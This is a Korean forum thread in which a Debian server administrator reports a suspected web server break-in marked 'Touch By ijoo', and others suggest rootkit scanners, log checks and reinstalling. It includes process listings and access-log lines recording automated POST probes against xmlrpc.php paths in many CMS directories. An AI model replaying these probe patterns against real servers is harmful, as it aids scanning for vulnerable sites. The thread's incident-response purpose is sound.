혹시 Touch By ijoo 란 것 보신 적 있으신가요? (웹서버 크랙 관련)

opiokane의 이미지

오늘 웹이 제대로 뜨질 않길래 프로세스를 확인해보니
웹서버는 하나도없고 유저명 www-data 로 Tourch By ijoo 라고
떠 있더군요.
크랙당한 것인지?
혹시 아시는분 계신가요?

ydhoney의 이미지

아이주가 어루만져주었군요.

루트킷 검사프로그램을 돌리는것을 우선 해보시고, 되도록이면 그냥 OS를 새로 까세요.

opiokane의 이미지

chkrootkit 을 돌려보았는데,
그것으로는 아무런 발견이 없습니다.
음~
참 위에 약간 틀렸는데,
Touch By ijoo 였습니다.
일단 급한 김에 시스템을 재시동하였더니
겉으로 보기에는 아무 이상없이 돌아가고 있습니다.

George double you Bush has two brains, the left and the right, like normal people. But the problem is that there is nothing right in his left brain and there is nothing left in his right brain"

Stand Alone Complex의 이미지

.

RET ;My life :P

jw0717의 이미지

모르는상태에서 다시 깔아봤자 재인스톨과정을 반복할가능성이..

리눅스 인스톨이 취미가 아니시라면 원인부터 밝혀야죠

chrootkit가 못찼았다면 rkhunter로도 돌려보고

netstat 로 안쓰는 포트가 사용인지도 확인해보고

ps -ef 로 해서 Touch By ijoo 의 프로세스를 확인한후 그 pid

/proc/PID 로 가서 exe가 뭐를 실행시키고 있는지도 보고해서

원인을 찾아야할듯.. 그래도.. 안된다면 OTL.. :roll:

p.s 검색해보니 크래킹맞는거 같네요..^^

크랙한넘 말로는 다른건 건든거없고 보안만 체크했다는데 믿을수없군요..

기왕 크랙한거 방법이나 알려주고 가지 썩을놈...

_의 이미지

ydhoney wrote:
어루만져주었군요.

이 표현 재밌네요. :D
opiokane의 이미지

답변 감사합니다.
어제 낮에 웹이 안뜨길래 들여다 보았더니 아파치 데몬이
하나도 없고
www-data xxxx x x xxxx xxxx Touch By ijoo
요렇게 되어 있더군요. xxxx 부분들은 기억이 나질 않는
부분들입니다. 웹을 살려 놓느라고 일단 서버를 재부팅
해버렸었거든요. 다른 서비스들은 정상 작동하고 있었습니다.

제가 chkrootkit은 심심하면 돌려보는데,
아무 것도 발견하지 못하고요.
rkhunter를 돌려도 php 4.3. 의 버전이 old거나
패치 버전이라고 나오는 것 말고는 아무것도 없습니다.
- PHP 4.3.10 [ Old or patched version ]

요렇게요...

위 서버는 데비안 stable에 커널 2.6.8을 smp 용으로 커스텀 컴파일했고요,
데비안 stable을 base 인스톨 한 다음에,
proftpd, APM만 깔고 그 이외에는 ssh만 이용하는데,
쉘로그인 하는 사람은 저 밖에 없으며 저는 항상
ssh만을 사용해서 로그인하고 ftp를 사용할 때는
ssh를 사용할 수 없는 계정을 따로 하나 만들어서
그 계정은 shell로그인을 막아 놓고 ftp만 사용합니다.
커널 이외에는 모두 데비안 패키지를 바이너리로 설치했으며
커널 소스도 데비안 커널 소스 패키지 받아서 컴파일 했습니다.
그 이외에는 한 두주일 전에 패키지들을 모두 update했습니다.
아마 커널을 컴파일 한 것 말고는 상당히 표준적으로 그리고
모두 바이너리로 설치를 했기 때문에,
데비안을 서버로 사용하시는 다른 분들에게도 참고가
되리라 생각됩니다....

ps -ef 한 결과와 netstat -e 한 결과는 다음과 같은데요......
(제가 ssh 로 두개의 터미널을 열어서 로그인 된 상태입니다.)
=========================================

ps -ef 결과
--------------------------------------------------------------------------------------------------
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 06:20 ? 00:00:00 init [2]
root 2 1 0 06:20 ? 00:00:00 [migration/0]
root 3 1 0 06:20 ? 00:00:00 [ksoftirqd/0]
root 4 1 0 06:20 ? 00:00:00 [migration/1]
root 5 1 0 06:20 ? 00:00:00 [ksoftirqd/1]
root 6 1 0 06:20 ? 00:00:00 [events/0]
root 7 1 0 06:20 ? 00:00:00 [events/1]
root 8 7 0 06:20 ? 00:00:00 [khelper]
root 9 7 0 06:20 ? 00:00:00 [kblockd/0]
root 10 7 0 06:20 ? 00:00:00 [kblockd/1]
root 11 1 0 06:20 ? 00:00:00 [kirqd]
root 12 7 0 06:20 ? 00:00:00 [pdflush]
root 13 7 0 06:20 ? 00:00:00 [pdflush]
root 14 1 0 06:20 ? 00:00:00 [kswapd0]
root 15 7 0 06:20 ? 00:00:00 [aio/0]
root 16 7 0 06:20 ? 00:00:00 [aio/1]
root 17 1 0 06:20 ? 00:00:00 [scsi_eh_0]
root 18 1 0 06:20 ? 00:00:00 [ahc_dv_0]
root 19 1 0 06:21 ? 00:00:00 [scsi_eh_1]
root 20 1 0 06:21 ? 00:00:00 [ahc_dv_1]
root 21 1 0 06:21 ? 00:00:00 [kseriod]
root 22 1 0 06:21 ? 00:00:00 [kjournald]
root 158 1 0 06:21 ? 00:00:00 [kjournald]
root 159 1 0 06:21 ? 00:00:00 [kjournald]
root 160 1 0 06:21 ? 00:00:00 [kjournald]
daemon 316 1 0 06:21 ? 00:00:00 /sbin/portmap
root 403 1 0 06:21 ? 00:00:00 /sbin/syslogd
root 406 1 0 06:21 ? 00:00:00 /sbin/klogd
root 424 1 0 06:21 ? 00:00:00 /bin/sh /usr/bin/mysqld_safe
mysql 461 424 0 06:21 ? 00:00:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --
root 462 424 0 06:21 ? 00:00:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
root 508 1 0 06:21 ? 00:00:00 /usr/sbin/sshd
nobody 515 1 0 06:21 ? 00:00:00 proftpd: (accepting connections)
daemon 518 1 0 06:21 ? 00:00:00 /usr/sbin/atd
root 521 1 0 06:21 ? 00:00:00 /usr/sbin/cron
root 532 1 0 06:21 ? 00:00:00 /usr/sbin/apache2 -k start -DSSL
root 538 1 0 06:21 tty1 00:00:00 /sbin/getty 38400 tty1
root 539 1 0 06:21 tty2 00:00:00 /sbin/getty 38400 tty2
root 540 1 0 06:21 tty3 00:00:00 /sbin/getty 38400 tty3
root 541 1 0 06:21 tty4 00:00:00 /sbin/getty 38400 tty4
root 542 1 0 06:21 tty5 00:00:00 /sbin/getty 38400 tty5
root 543 1 0 06:21 tty6 00:00:00 /sbin/getty 38400 tty6
www-data 1464 532 0 09:57 ? 00:00:00 /usr/sbin/apache2 -k start -DSSL
www-data 1571 532 0 11:22 ? 00:00:01 /usr/sbin/apache2 -k start -DSSL
www-data 1572 532 0 11:22 ? 00:00:00 /usr/sbin/apache2 -k start -DSSL
www-data 1581 532 0 11:23 ? 00:00:00 /usr/sbin/apache2 -k start -DSSL
www-data 1582 532 0 11:23 ? 00:00:00 /usr/sbin/apache2 -k start -DSSL
www-data 1583 532 0 11:23 ? 00:00:00 /usr/sbin/apache2 -k start -DSSL
www-data 1585 532 0 11:23 ? 00:00:01 /usr/sbin/apache2 -k start -DSSL
www-data 1591 532 0 11:25 ? 00:00:00 /usr/sbin/apache2 -k start -DSSL
www-data 1593 532 0 11:25 ? 00:00:00 /usr/sbin/apache2 -k start -DSSL
root 1717 508 0 13:58 ? 00:00:00 sshd: opiokane [priv]
opiokane 1720 1717 0 13:58 ? 00:00:00 sshd: opiokane@pts/0
opiokane 1721 1720 0 13:58 pts/0 00:00:00 -bash
root 1735 1721 0 13:58 pts/0 00:00:00 bash
root 16010 508 0 14:08 ? 00:00:00 sshd: opiokane [priv]
opiokane 16013 16010 0 14:08 ? 00:00:00 sshd: opiokane@pts/1
opiokane 16014 16013 0 14:08 pts/1 00:00:00 -bash
root 16028 16014 0 14:08 pts/1 00:00:00 bash
www-data 16067 532 0 14:21 ? 00:00:00 /usr/sbin/apache2 -k start -DSSL
root 16072 16028 0 14:34 pts/1 00:00:00 ps -ef

------------------------------------
netstat -e 결과

www:/home/opiokane# netstat -e
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address Foreign Address State User Inode
tcp 0 272 www.*********.com:ssh rrcs-67-53-42-126:56489 ESTABLISHEDroot 15695
Active UNIX domain sockets (w/o servers)
Proto RefCnt Flags Type State I-Node Path
unix 5 [ ] DGRAM 992 /dev/log
unix 2 [ ] DGRAM 15712
unix 3 [ ] STREAM CONNECTED 15711
unix 3 [ ] STREAM CONNECTED 15710
unix 3 [ ] STREAM CONNECTED 3661 /var/run/mysqld/mysqld.sock
unix 3 [ ] STREAM CONNECTED 3660
unix 2 [ ] DGRAM 1067
unix 2 [ ] DGRAM 1004

George double you Bush has two brains, the left and the right, like normal people. But the problem is that there is nothing right in his left brain and there is nothing left in his right brain"

opiokane의 이미지

로그를 중심으로 분석을 하고 있는데,
아무래도 어렵군요...쩝

다시 깔면 다른 OS를 깔려고 생각하고 있습니다.
원인을 모르는 상태에서 그대로 다시 설치하는
것이야 완전 바보 짓이고, 다른 OS를 깔면 그래서
달라지지 않을까 하는 생각에 말이죠.
그런데 처음 데비안으로 운영하는 서버라(다른 서버들은
모두 프비를 사용했거든요.) 다른 것 깔기는 정말
싫은데....음...
일단 루트 권한으로 된 것들 대부분 삭제하거나 바꾸고.
심지어는 php 코드들 중에도 owner가 root인 것들 모두
바꾸고 그랬는데....
매일 백업하고 좀 더 지켜보다가 문제가 생기면
openBSD 나 설치할까 생각 중입니다...

George double you Bush has two brains, the left and the right, like normal people. But the problem is that there is nothing right in his left brain and there is nothing left in his right brain"

opiokane의 이미지

php 파일들을 점검하고 그 파일들 중 주인이 루트로 된 것들 모두 바꾸는등
작업을 하고 오늘 auth.log 를 들여다 보니까 변경 조치를 취한 다음 날부터
어떤 분이 열심히 사전을 돌리고 있네요....
2일 동안 참 열심히도 돌렸군요.ㅎㅎ..
포트들도 좀 더 점검해 봐야 겠습니다....

George double you Bush has two brains, the left and the right, like normal people. But the problem is that there is nothing right in his left brain and there is nothing left in his right brain"

오리주둥이의 이미지

access.log를 살펴보시는게 더 빨리 검색이 가능하실겁니다.

ps 명령으로도 해결이 안될 수 있으니까요.
그리고 크래킹 당하면 무조건 명령어가 트로이에 감염되는것은 아니니까요.
크래킹 프로그램에 따라 달라집니다.

귀찮으시겠고.. 로그도 어마어마하겠지만
200번대의 로그중 POST 나 cmd가 포함된것들만 grep로 확인 후 프린트해서 보시는것이 크래킹 당했는지
가장 빨리 알아볼 수 있는 방법입니다.

secure 관련이나 message 관련 로그는 다 날렸을 가능성이 크다고 보네요.
그리고 거기에 남지 않는경우도 허다하니까요.

별 탈 없으시더라도 가급적 새로 설치하셔야 할듯 합니다.
크래커들의 특징 중 하나가 백도어를 설치해놓고 임의로 사용하거나 기타등등 발악을 한 후
얘네들이 어케나오나 지켜보다가 시스템을 개아작 낸다고 하더군요.

섬ㅤㅉㅣㅅ하죠? -_-a

opiokane의 이미지

그렇잖아도 home 디렉터리를 모두 백업한 후 이것 저것 확인해 보면서,
assecc 로그들을 확인했었습니다.

다음은 크랙 당한 것을 알고난 뒤 일단 급한 조치를 취하고 난 이후의 access.log 입니다.
사실 도메인이 여러개 들어 있는데, 하나의 도메인의 access 로그에만 이와같은 것들이 있더군요...ㅎㅎㅎ.
jsboard, drupal, phpgroupware 등 CMS들의 디렉터리를 찾아 넣으려한 것 같은데....(사실 제가 php나 웹은 잘 모르거든요.) 이런 것들 사용하지 않는 것인데?? 특히 외국의 cms들 이름과 더불어 jsboard가 들어 있네요...

참고들 하세요....

---------------------------------------------------------------

125.191.75.23 - - [18/Dec/2005:18:48:19 -1000] "POST /jsboard/act.php HTTP/1.1" 404 1098 "http://www.*********.com/jsboard/write.php?table=*******_ad&page=" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; .NET CLR 1.0.3705)"
64.207.218.11 - - [19/Dec/2005:04:47:33 -1000] "POST /xmlrpc.php HTTP/1.1" 404 1098 "-" "Mozilla/4.0 (compatible; MSIE
6.0; Windows NT 5.1;)"
64.207.218.11 - - [19/Dec/2005:04:47:34 -1000] "POST /blog/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
64.207.218.11 - - [19/Dec/2005:04:47:35 -1000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
64.207.218.11 - - [19/Dec/2005:04:47:36 -1000] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
64.207.218.11 - - [19/Dec/2005:04:47:37 -1000] "POST /drupal/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
64.207.218.11 - - [19/Dec/2005:04:47:39 -1000] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
64.207.218.11 - - [19/Dec/2005:04:47:40 -1000] "POST /wordpress/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
64.207.218.11 - - [19/Dec/2005:04:47:41 -1000] "POST /xmlrpc.php HTTP/1.1" 404 1098 "-" "Mozilla/4.0 (compatible; MSIE
6.0; Windows NT 5.1;)"
64.207.218.11 - - [19/Dec/2005:04:47:42 -1000] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
64.207.218.11 - - [19/Dec/2005:04:47:43 -1000] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
24.76.197.129 - - [19/Dec/2005:23:44:51 -1000] "POST /xmlrpc.php HTTP/1.1" 404 1098 "-" "Mozilla/4.0 (compatible; MSIE
6.0; Windows NT 5.1;)"
24.76.197.129 - - [19/Dec/2005:23:44:52 -1000] "POST /blog/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
24.76.197.129 - - [19/Dec/2005:23:44:54 -1000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
24.76.197.129 - - [19/Dec/2005:23:44:56 -1000] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
24.76.197.129 - - [19/Dec/2005:23:44:57 -1000] "POST /drupal/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
24.76.197.129 - - [19/Dec/2005:23:44:59 -1000] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
24.76.197.129 - - [19/Dec/2005:23:45:00 -1000] "POST /wordpress/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
24.76.197.129 - - [19/Dec/2005:23:45:02 -1000] "POST /xmlrpc.php HTTP/1.1" 404 1098 "-" "Mozilla/4.0 (compatible; MSIE
6.0; Windows NT 5.1;)"
24.76.197.129 - - [19/Dec/2005:23:45:03 -1000] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
24.76.197.129 - - [19/Dec/2005:23:45:04 -1000] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
82.224.76.103 - - [20/Dec/2005:00:27:49 -1000] "POST /xmlrpc.php HTTP/1.1" 404 1098 "-" "Mozilla/4.0 (compatible; MSIE
6.0; Windows NT 5.1;)"
82.224.76.103 - - [20/Dec/2005:00:27:50 -1000] "POST /blog/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
82.224.76.103 - - [20/Dec/2005:00:27:52 -1000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
82.224.76.103 - - [20/Dec/2005:00:27:53 -1000] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
82.224.76.103 - - [20/Dec/2005:00:27:54 -1000] "POST /drupal/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
82.224.76.103 - - [20/Dec/2005:00:27:55 -1000] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
82.224.76.103 - - [20/Dec/2005:00:27:57 -1000] "POST /wordpress/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
82.224.76.103 - - [20/Dec/2005:00:27:58 -1000] "POST /xmlrpc.php HTTP/1.1" 404 1098 "-" "Mozilla/4.0 (compatible; MSIE
6.0; Windows NT 5.1;)"
82.224.76.103 - - [20/Dec/2005:00:27:59 -1000] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
82.224.76.103 - - [20/Dec/2005:00:28:00 -1000] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
84.83.161.32 - - [20/Dec/2005:04:39:39 -1000] "POST /xmlrpc.php HTTP/1.1" 404 1098 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
84.83.161.32 - - [20/Dec/2005:04:39:40 -1000] "POST /blog/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
84.83.161.32 - - [20/Dec/2005:04:39:41 -1000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
84.83.161.32 - - [20/Dec/2005:04:39:43 -1000] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
84.83.161.32 - - [20/Dec/2005:04:39:44 -1000] "POST /drupal/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
84.83.161.32 - - [20/Dec/2005:04:39:45 -1000] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
84.83.161.32 - - [20/Dec/2005:04:39:46 -1000] "POST /wordpress/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
84.83.161.32 - - [20/Dec/2005:04:39:47 -1000] "POST /xmlrpc.php HTTP/1.1" 404 1098 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
84.83.161.32 - - [20/Dec/2005:04:39:49 -1000] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
84.83.161.32 - - [20/Dec/2005:04:39:50 -1000] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
212.175.111.25 - - [20/Dec/2005:05:39:14 -1000] "POST /xmlrpc.php HTTP/1.1" 404 1098 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
212.175.111.25 - - [20/Dec/2005:05:39:15 -1000] "POST /blog/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
212.175.111.25 - - [20/Dec/2005:05:39:16 -1000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
212.175.111.25 - - [20/Dec/2005:05:39:18 -1000] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
212.175.111.25 - - [20/Dec/2005:05:39:19 -1000] "POST /drupal/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1;)"
212.175.111.25 - - [20/Dec/2005:05:39:20 -1000] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
212.175.111.25 - - [20/Dec/2005:05:39:21 -1000] "POST /wordpress/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
212.175.111.25 - - [20/Dec/2005:05:39:23 -1000] "POST /xmlrpc.php HTTP/1.1" 404 1098 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
212.175.111.25 - - [20/Dec/2005:05:39:24 -1000] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1;)"
212.175.111.25 - - [20/Dec/2005:05:39:25 -1000] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1;)"
84.134.232.72 - - [20/Dec/2005:08:55:11 -1000] "POST /xmlrpc.php HTTP/1.1" 404 1098 "-" "Mozilla/4.0 (compatible; MSIE
6.0; Windows NT 5.1;)"
84.134.232.72 - - [20/Dec/2005:08:55:13 -1000] "POST /blog/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
84.134.232.72 - - [20/Dec/2005:08:55:14 -1000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
84.134.232.72 - - [20/Dec/2005:08:55:15 -1000] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
84.134.232.72 - - [20/Dec/2005:08:55:17 -1000] "POST /drupal/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
84.134.232.72 - - [20/Dec/2005:08:55:18 -1000] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
84.134.232.72 - - [20/Dec/2005:08:55:19 -1000] "POST /wordpress/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
84.134.232.72 - - [20/Dec/2005:08:55:20 -1000] "POST /xmlrpc.php HTTP/1.1" 404 1098 "-" "Mozilla/4.0 (compatible; MSIE
6.0; Windows NT 5.1;)"
84.134.232.72 - - [20/Dec/2005:08:55:22 -1000] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
84.134.232.72 - - [20/Dec/2005:08:55:23 -1000] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.17.169.50 - - [20/Dec/2005:09:23:57 -1000] "POST /xmlrpc.php HTTP/1.1" 404 1098 "-" "Mozilla/4.0 (compatible; MSIE
6.0; Windows NT 5.1;)"
200.17.169.50 - - [20/Dec/2005:09:23:58 -1000] "POST /blog/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.17.169.50 - - [20/Dec/2005:09:24:00 -1000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.17.169.50 - - [20/Dec/2005:09:24:01 -1000] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.17.169.50 - - [20/Dec/2005:09:24:03 -1000] "POST /drupal/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.17.169.50 - - [20/Dec/2005:09:24:04 -1000] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.17.169.50 - - [20/Dec/2005:09:24:06 -1000] "POST /wordpress/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.17.169.50 - - [20/Dec/2005:09:24:07 -1000] "POST /xmlrpc.php HTTP/1.1" 404 1098 "-" "Mozilla/4.0 (compatible; MSIE
6.0; Windows NT 5.1;)"
200.17.169.50 - - [20/Dec/2005:09:24:08 -1000] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.17.169.50 - - [20/Dec/2005:09:24:10 -1000] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
81.223.135.122 - - [20/Dec/2005:13:29:07 -1000] "POST /xmlrpc.php HTTP/1.1" 404 1098 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
81.223.135.122 - - [20/Dec/2005:13:29:08 -1000] "POST /blog/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
81.223.135.122 - - [20/Dec/2005:13:29:09 -1000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
81.223.135.122 - - [20/Dec/2005:13:29:11 -1000] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
81.223.135.122 - - [20/Dec/2005:13:29:12 -1000] "POST /drupal/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1;)"
81.223.135.122 - - [20/Dec/2005:13:29:13 -1000] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
81.223.135.122 - - [20/Dec/2005:13:29:14 -1000] "POST /wordpress/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
81.223.135.122 - - [20/Dec/2005:13:29:16 -1000] "POST /xmlrpc.php HTTP/1.1" 404 1098 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
81.223.135.122 - - [20/Dec/2005:13:29:17 -1000] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1;)"
81.223.135.122 - - [20/Dec/2005:13:29:18 -1000] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1;)"
69.20.59.12 - - [20/Dec/2005:14:31:39 -1000] "POST /xmlrpc.php HTTP/1.1" 404 1098 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
69.20.59.12 - - [20/Dec/2005:14:31:40 -1000] "POST /blog/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE
6.0; Windows NT 5.1;)"
69.20.59.12 - - [20/Dec/2005:14:31:41 -1000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
69.20.59.12 - - [20/Dec/2005:14:31:42 -1000] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
69.20.59.12 - - [20/Dec/2005:14:31:43 -1000] "POST /drupal/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
69.20.59.12 - - [20/Dec/2005:14:31:44 -1000] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
69.20.59.12 - - [20/Dec/2005:14:31:46 -1000] "POST /wordpress/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1;)"
69.20.59.12 - - [20/Dec/2005:14:31:47 -1000] "POST /xmlrpc.php HTTP/1.1" 404 1098 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
69.20.59.12 - - [20/Dec/2005:14:31:48 -1000] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
69.20.59.12 - - [20/Dec/2005:14:31:49 -1000] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
